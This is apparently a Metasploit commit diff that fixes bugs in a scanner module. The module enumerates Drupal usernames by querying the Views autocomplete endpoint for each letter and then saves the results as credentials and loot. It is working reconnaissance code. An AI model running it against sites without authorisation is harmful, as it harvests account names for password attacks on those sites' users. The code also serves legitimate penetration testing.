Fix bugs in drupal_views_user_enum.

2015-10-04 05:53:54 -03:00 · 2015-10-04 05:53:54 -03:00 · ed8f5456a4
parent fc09eaf517
commit ed8f5456a4
1 changed files with 28 additions and 28 deletions
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
  end

  def check_host(ip)
-    res = send_request_cgi({
+    res = send_request_cgi(
      'uri'     => base_uri,
      'method'  => 'GET',
      'headers' => { 'Connection' => 'Close' }
-    }, 25)
+    )

-    if not res
+    unless res
      return Exploit::CheckCode::Unknown
-    elsif res and res.body =~ /\<title\>Access denied/
+    end
+
+    if res.body.include?('Access denied')
      # This probably means the Views Module actually isn't installed
-      vprint_error("#{rhost} - Access denied")
+      print_error("#{peer} - Access denied")
      return Exploit::CheckCode::Safe
-    elsif res and res.message != 'OK' or res.body != '[  ]'
+    elsif res.message != 'OK' || res.body != '[  ]'
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
      return
    end

-    print_status("Begin enumerating users at #{ip}")
+    print_status("Begin enumerating users at #{vhost}")

    results = []
    ('a'..'z').each do |l|
      vprint_status("Iterating on letter: #{l}")

-      res = send_request_cgi({
-        'uri'     => base_uri+l,
+      res = send_request_cgi(
+        'uri'     => "#{base_uri}#{l}",
        'method'  => 'GET',
        'headers' => { 'Connection' => 'Close' }
-      }, 25)
+      )

-      if (res and res.message == "OK")
-        user_list = res.body.scan(/\w+/)
+      if res && res.message == 'OK'
+        begin
+          user_list = JSON.parse(res.body)
+        rescue JSON::ParserError => e
+          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+          return []
+        end
        if user_list.empty?
-          vprint_line("\tFound: Nothing")
+          vprint_error("Not found with: #{l}")
        else
-          vprint_line("\tFound: #{user_list.inspect}")
-          results << user_list
+          vprint_good("Found: #{user_list}")
+          results << user_list.flatten.uniq
        end
      else
-        print_error("Unexpected results from server")
+        print_error("#{peer} - Unexpected results from server")
        return
      end
    end

-    final_results = results.flatten.uniq
-
-    print_status("Done. " + final_results.length.to_s + " usernames found...")
-
-    final_results.each do |user|
+    print_status("Done. #{results.length} usernames found...")
+    results.flatten.uniq.each do |user|
      print_good("Found User: #{user}")

      report_cred(
        ip: Rex::Socket.getaddress(datastore['RHOST']),
        port: datastore['RPORT'],
        user: user,
-        proof: base_uri+l
+        proof: base_uri
      )
    end

-    # One username per line
-    final_results = final_results * "\n"
-
+    results = results * "\n"
    p = store_loot(
      'drupal_user',
      'text/plain',
      Rex::Socket.getaddress(datastore['RHOST']),
-      final_results.to_s,
+      results.to_s,
      'drupal_user.txt'
    )
-
    print_status("Usernames stored in: #{p}")
  end
-
 end